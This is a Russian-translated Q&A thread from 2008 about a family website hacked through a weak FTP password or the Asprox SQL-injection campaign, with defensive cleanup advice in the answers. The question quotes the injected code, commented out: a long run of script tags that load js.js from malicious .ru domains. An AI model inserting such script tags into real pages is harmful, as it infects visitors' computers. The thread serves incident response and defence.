Мой сайт взломан .. Что мне делать? [закрыто]

Мой папа позвонил мне сегодня и сказал, что люди, заходящие на его сайт, получают 168 вирусов, пытающихся загрузить на свои компьютеры. Он совсем не технический и создал все это с помощью редактора WYSIWYG.

Я открыл его сайт и просмотрел источник, и перед закрывающим HTML-тегом была строка с включенным Javascript внизу исходного кода. Они включили этот файл (среди многих других): http://www.98hs.ru/js.js <- ВЫКЛЮЧИТЕ JAVASCRIPT ПЕРЕД ТЕМ, ЧТО ВЫ НАЙДЕТЕ НА ЭТОТ URL.

Поэтому я прокомментировал это сейчас. Оказывается, его пароль FTP был простым словарным словом длиной шесть букв, поэтому мы думаем, что так его взломали. Мы изменили его пароль на 8+-значную несловую строку (он не стал бы использовать парольную фразу, так как он охотник за хан-н-пеком).

Я сделал whois на 98hs.ru и обнаружил, что он размещен на сервере в Чили. С ним тоже связан адрес электронной почты, но я серьезно сомневаюсь, что этот человек является виновником. Вероятно, просто какой-то другой сайт, который взломали ...

Я понятия не имею, что делать на этом этапе, хотя я никогда не имел дело с такими вещами раньше. У кого-нибудь есть предложения?

Он использовал обычный Джейн незащищенный FTP через webhost4life.com. Я даже не вижу способа сделать sftp на их сайте. Я думаю, что его имя пользователя и пароль были перехвачены?

Итак, чтобы сделать это более актуальным для сообщества, какие шаги вы должны предпринять / передовой опыт, которому вы должны следовать, чтобы защитить ваш сайт от взлома?

Для справки, вот строка кода, которая «волшебным образом» была добавлена ​​к его файлу (и отсутствует в его файле на его компьютере - я оставил его закомментированным просто для полной уверенности, что он ничего не сделает на этой странице, хотя я уверен, что Джефф будет настороже против этого):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
5.08.2008 23:55:25
Просто, у webhost4life есть sftp в порту 2222.
ruffin 14.12.2014 21:20:33
8 ОТВЕТОВ
РЕШЕНИЕ

Попробуйте собрать как можно больше информации. Посмотрите, может ли хост предоставить вам журнал, показывающий все FTP-соединения, которые были сделаны с вашей учетной записью. Вы можете использовать их, чтобы узнать, было ли это соединение FTP использовано для изменения и, возможно, получить IP-адрес.

Если вы используете предварительно упакованное программное обеспечение, такое как Wordpress, Drupal или что-то еще, что вы не написали, могут быть уязвимости в загружаемом коде, которые допускают изменения такого рода. Если это пользовательская сборка, дважды проверьте все места, где вы разрешаете пользователям загружать файлы или изменять существующие файлы.

Второе - взять дамп сайта как есть и проверить все на наличие других модификаций. Это может быть просто одна модификация, которую они сделали, но если они вошли через FTP, кто знает, что еще там.

Верните свой сайт обратно в известное исправное состояние и при необходимости обновите его до последней версии.

Существует уровень возврата, который вы должны принять во внимание. Стоит ли пытаться выследить человека за ущерб или это то, где вы просто живете, изучаете и используете более надежные пароли?

14
6.08.2008 00:16:07

С паролем, состоящим из шести слов, он мог быть взломан. Это более вероятно, чем его ftp, перехваченный, но это также может быть.

Начните с более надежного пароля. (8 символов все еще довольно слабые)

Посмотрите, полезна ли эта ссылка на блог по безопасности в Интернете .

3
6.08.2008 00:04:46

Является ли сайт просто статическим HTML? то есть он не сумел сам кодировать страницу загрузки, которая позволяет любому водителю загружать скомпрометированные скрипты / страницы?

Почему бы не спросить webhost4life, есть ли у них доступные журналы FTP, и сообщить о проблеме им. Вы никогда не знаете, они могут быть весьма восприимчивыми и выяснить для вас, что именно произошло?

Я работаю на хостера с общим доступом, и мы всегда приветствуем подобные отчеты и обычно можем точно определить вектор атаки и посоветовать, где клиент ошибся.

2
6.08.2008 00:24:23

Вы упоминаете, что ваш папа использовал инструмент для публикации на сайте.

Если средство публикации публикует данные со своего компьютера на сервере, это может быть связано с тем, что его локальные файлы являются чистыми, и что ему просто необходимо повторно опубликовать на сервере.

Он должен посмотреть, есть ли другой способ входа на его сервер, чем обычный FTP, хотя ... это не очень безопасно, потому что он отправляет его пароль в виде открытого текста через Интернет.

5
6.08.2008 03:31:22

Я знаю, что это немного поздно в игре, но URL, упомянутый для JavaScript, упоминается в списке сайтов, которые, как известно, были частью возрождения бота ASPRox, которое началось в июне (по крайней мере, тогда мы были отмечены Это). Некоторые подробности об этом упоминаются ниже:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Противная вещь в этом состоит в том, что фактически каждое поле типа varchar в базе данных «заражено», чтобы выдать ссылку на этот URL, в котором браузер получает крошечный iframe, который превращает его в бота. Базовое исправление SQL для этого можно найти здесь:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

Страшно, однако, то, что вирус ищет в системных таблицах значения для заражения, и многие планы совместного хостинга также разделяют пространство базы данных для своих клиентов. Так что, скорее всего, был заражен даже не сайт вашего отца, а чужой сайт в его хост-кластере, который написал некачественный код и открыл дверь для атаки SQL-инъекцией.

Если он еще этого не сделал, я бы отправил СРОЧНОЕ электронное письмо на их хост и дал бы им ссылку на этот код SQL, чтобы исправить всю систему. Вы можете исправить свои собственные затронутые таблицы базы данных, но, скорее всего, боты, которые заражают, снова пройдут через эту дыру и заразят целую партию.

Надеюсь, это даст вам больше информации для работы.

РЕДАКТИРОВАТЬ: Еще одна быстрая мысль, если он использует один из инструментов онлайн-дизайна хостов для создания своего сайта, весь этот контент, вероятно, находится в столбце и был заражен таким образом.

14
20.11.2016 00:20:03

Нас, видимо, взломали те же парни! Или боты, в нашем случае. Они использовали SQL-инъекцию в URL на некоторых старых классических сайтах ASP, которые больше никто не поддерживает. Мы нашли атакующие IP-адреса и заблокировали их в IIS. Теперь мы должны провести рефакторинг всего старого ASP. Поэтому я советую сначала взглянуть на журналы IIS, чтобы выяснить, есть ли проблема в коде вашего сайта или в конфигурации сервера.

-1
16.08.2008 16:35:18

Отключите веб-сервер, не выключая его, чтобы избежать сценариев завершения работы. Проанализируйте жесткий диск через другой компьютер как диск с данными и посмотрите, сможете ли вы определить виновника по файлам журналов и тому подобному. Убедитесь, что код безопасен, а затем восстановите его из резервной копии.

0
26.09.2008 20:12:13

Это недавно произошло с моим клиентом, который был размещен на ipower. Я не уверен, была ли ваша хостинговая среда базирующейся на Apache, но если это было обязательно, дважды проверьте файлы .htaccess, которые вы не создали, особенно над webroot и внутри каталогов изображений, так как они имеют тенденцию вносить некоторую злобу туда также (они перенаправляли людей в зависимости от того, откуда они пришли в ссылке). Также проверьте все, что вы создали для кода, который вы не написали.

0
26.09.2008 20:21:14